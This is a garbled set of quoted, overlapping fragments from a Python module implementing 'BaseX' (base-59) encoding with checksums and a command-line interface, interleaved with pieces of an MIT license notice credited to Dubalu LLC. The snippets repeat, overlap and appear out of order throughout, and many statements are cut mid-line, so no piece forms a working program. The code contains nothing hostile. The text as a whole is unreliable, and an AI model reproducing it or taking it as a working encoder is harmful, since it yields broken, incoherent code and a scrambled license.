reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if", "copy # of this software and associated documentation files (the \"Software\"), to deal", "character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base:", "/ self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string", "if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base +", "= decimal * self.base + i sum_chk += i sumsz += 1 sum_chk", "to the following conditions: # # The above copyright notice and this permission", "included in # all copies or substantial portions of the Software. # #", "0 for c in map(ord, reversed(v)): acc += p * c p =", "isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p,", "the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "'%s'\" % type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)):", "and associated documentation files (the \"Software\"), to deal # in the Software without", "b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX", "def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v", "default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return result +", "% self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded", "self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff) acc", "raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk", "self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if", "string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if", "acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base", "not '%s'\" % type(v).__name__) p, acc = 1, 0 for c in map(ord,", "else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\"", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "reversed(v)): acc += p * c p = p << 8 result, sum_chk", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\"", "chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str):", "= b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or", "\"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate):", "result = [] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr,", "output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file',", "sublicense, and/or sell # copies of the Software, and to permit persons to", "Software is # furnished to do so, subject to the following conditions: #", "- (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v):", "self.translate: o = ord(a) i = self.decoder[o] if i < self.base: x =", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "= self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result", "def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet)", "= x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not", "v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for", "sumsz / self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk =", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "try: result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes):", "-1 for a in self.translate: o = ord(a) i = self.decoder[o] if i", "= self.decoder[o] if i < self.base: x = i else: self.decoder[o] = x", "self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx = divmod(i,", "- (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode", "self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] *", "+= idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base return", "checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii')", ">= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk", "i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i:", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. #", "= self.decoder[o] if i < 0: continue if i >= self.base: raise ValueError(\"Invalid", "sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return", "self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet):", "alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for", "of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-')", "sumsz / self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a", "= i x = -1 for a in self.translate: o = ord(a) i", "0 sumsz = 0 for char in v: o = ord(char) i =", "# copies of the Software, and to permit persons to whom the Software", "{ (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try:", "an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk", "chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc:", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string =", "idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base return string,", "__version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate", "this permission notice shall be included in # all copies or substantial portions", "enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for a in", "i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using", "encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a", "required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for c in", "'--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun = {", "= ord(a) i = self.decoder[o] if i < self.base: x = i else:", "char in v: o = ord(char) i = self.decoder[o] if i < 0:", "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "def main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\"", "= [] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result)))", "software and associated documentation files (the \"Software\"), to deal # in the Software", "v[:-1] if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\")", "not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk =", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk =", "+= p * c p = p << 8 result, sum_chk = self.encode_int(acc,", "i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i", "using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not", "and to permit persons to whom the Software is # furnished to do", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "(self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0')", "decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v,", "the following conditions: # # The above copyright notice and this permission notice", "o = ord(char) i = self.decoder[o] if i < 0: continue if i", "LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk += sumsz +", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a in", "rights reserved. # # Permission is hereby granted, free of charge, to any", "i x = -1 for a in self.translate: o = ord(a) i =", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "acc = 1, 0 for c in map(ord, reversed(v)): acc += p *", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result,", "in # all copies or substantial portions of the Software. # # THE", "v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like", "i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal =", "to do so, subject to the following conditions: # # The above copyright", "+= sumsz + sumsz / self.base return string, sum_chk % self.base def encode(self,", "isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base -", "THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def", "self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result =", "False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result =", "sum_chk += sumsz + sumsz / self.base return string, sum_chk % self.base def", "p * c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False)", "acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for", "sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode',", "x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i", "string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required,", "return self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx =", "not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v =", "whom the Software is # furnished to do so, subject to the following", "self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH", "(False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result", "divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string)", "encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet =", "free of charge, to any person obtaining a copy # of this software", "checksum\") result = [] while acc: result.append(acc & 0xff) acc >>= 8 return", "type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)): acc +=", "self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59", "= 1, 0 for c in map(ord, reversed(v)): acc += p * c", "}[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e:", "for char in v: o = ord(char) i = self.decoder[o] if i <", "PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "map(ord, reversed(v)): acc += p * c p = p << 8 result,", "as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v)", "and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i: i,", "a checksum before encoding') args = parser.parse_args() fun = { (False, False): b59encode,", "is # furnished to do so, subject to the following conditions: # #", "Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc =", "<< 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk %", "'--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding')", "\"\" sum_chk = 0 while i: i, idx = divmod(i, self.base) string =", "string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk +=", "to deal # in the Software without restriction, including without limitation the rights", "to any person obtaining a copy # of this software and associated documentation", "+= sumsz + sumsz / self.base return decimal, sum_chk % self.base def decode(self,", "isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1]", "v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk %", "permission notice shall be included in # all copies or substantial portions of", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if", "'~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode", "not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base", "BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN", "is required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for c", "sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\")", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "= translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result", "self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a)", "(sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode", "Software, and to permit persons to whom the Software is # furnished to", "a in self.translate: o = ord(a) i = self.decoder[o] if i < self.base:", "self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using", "self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string", "LLC. All rights reserved. # # Permission is hereby granted, free of charge,", "parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun", "% self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v,", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE.", "self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes):", "self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str):", "this software and associated documentation files (the \"Software\"), to deal # in the", "acc += p * c p = p << 8 result, sum_chk =", "e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ ==", "BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii')", "sumsz + sumsz / self.base return decimal, sum_chk % self.base def decode(self, v):", "b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard", "idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz", "OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX", "% self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode", "decimal = decimal * self.base + i sum_chk += i sumsz += 1", "shall be included in # all copies or substantial portions of the Software.", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if", "data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args()", "while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk", "input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser =", "granted, free of charge, to any person obtaining a copy # of this", "0 for char in v: o = ord(char) i = self.decoder[o] if i", "= \"\" sum_chk = 0 while i: i, idx = divmod(i, self.base) string", "return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\"", "False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception", "\"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v", "Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby", "All rights reserved. # # Permission is hereby granted, free of charge, to", "stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument(", "i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1", "not i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while", "= 0 sumsz = 0 for char in v: o = ord(char) i", "decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if", "furnished to do so, subject to the following conditions: # # The above", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "v: o = ord(char) i = self.decoder[o] if i < 0: continue if", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "# Permission is hereby granted, free of charge, to any person obtaining a", "= p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base -", "bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "reserved. # # Permission is hereby granted, free of charge, to any person", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\"", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "standard output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument(", "string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk", "sum_chk += sumsz + sumsz / self.base return decimal, sum_chk % self.base def", "sum_chk = 0 sumsz = 0 for char in v: o = ord(char)", "be included in # all copies or substantial portions of the Software. #", "v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0:", "# THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object):", "def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "[] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "string as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal =", "except Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result)", "args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e)", "character for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc,", "isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz =", "encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode,", "= alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256", "import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE',", "in the Software without restriction, including without limitation the rights # to use,", "\"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object", "(C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted,", "= ord(a) self.decoder[o] = i x = -1 for a in self.translate: o", "if not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v", "if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk", "self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "copies of the Software, and to permit persons to whom the Software is", "i = self.decoder[o] if i < self.base: x = i else: self.decoder[o] =", "c in map(ord, reversed(v)): acc += p * c p = p <<", "1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk % self.base", "decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v =", "Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if", "/ self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "if i < self.base: x = i else: self.decoder[o] = x def encode_int(self,", "sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc &", "for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x =", "TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc = 1,", "ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff) acc >>= 8", "self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX", "chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk +=", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "+ i sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data)", "= (self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is", "result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) %", "ord(char) i = self.decoder[o] if i < 0: continue if i >= self.base:", "parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument(", "% self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff)", ">>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX", "and/or sell # copies of the Software, and to permit persons to whom", "< 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal", "\"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v =", "IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class", "sumsz + sumsz / self.base return string, sum_chk % self.base def encode(self, v):", "ord(a) i = self.decoder[o] if i < self.base: x = i else: self.decoder[o]", "# in the Software without restriction, including without limitation the rights # to", "default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a", "'-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun =", "as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0", "str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk", "= ord(char) i = self.decoder[o] if i < 0: continue if i >=", "self.decoder[o] = i x = -1 for a in self.translate: o = ord(a)", "for a in self.translate: o = ord(a) i = self.decoder[o] if i <", "1, 0 for c in map(ord, reversed(v)): acc += p * c p", "BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet", "b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE,", "data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "bytes-like object is required, not '%s'\" % type(v).__name__) p, acc = 1, 0", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o =", "x = -1 for a in self.translate: o = ord(a) i = self.decoder[o]", "& 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum", "encoded string as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal", "any person obtaining a copy # of this software and associated documentation files", "# # The above copyright notice and this permission notice shall be included", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if", "x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an", "or decode FILE, or standard input, to standard output.\"\"\" import sys import argparse", "len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk % self.base", "copyright notice and this permission notice shall be included in # all copies", "AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "= 0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] +", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "OTHER DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ =", "using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\" sum_chk", "sum_chk = 0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx]", "< 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk", "default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx", "string = \"\" sum_chk = 0 while i: i, idx = divmod(i, self.base)", "self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return result", "i sumsz += 1 sum_chk += sumsz + sumsz / self.base return decimal,", "sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz / self.base", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "0 sum_chk = 0 sumsz = 0 for char in v: o =", "import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'),", "self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if", "charge, to any person obtaining a copy # of this software and associated", "v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v, str):", "if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" %", "p, acc = 1, 0 for c in map(ord, reversed(v)): acc += p", "if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\") break", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO", "action='store_true', help='append a checksum before encoding') args = 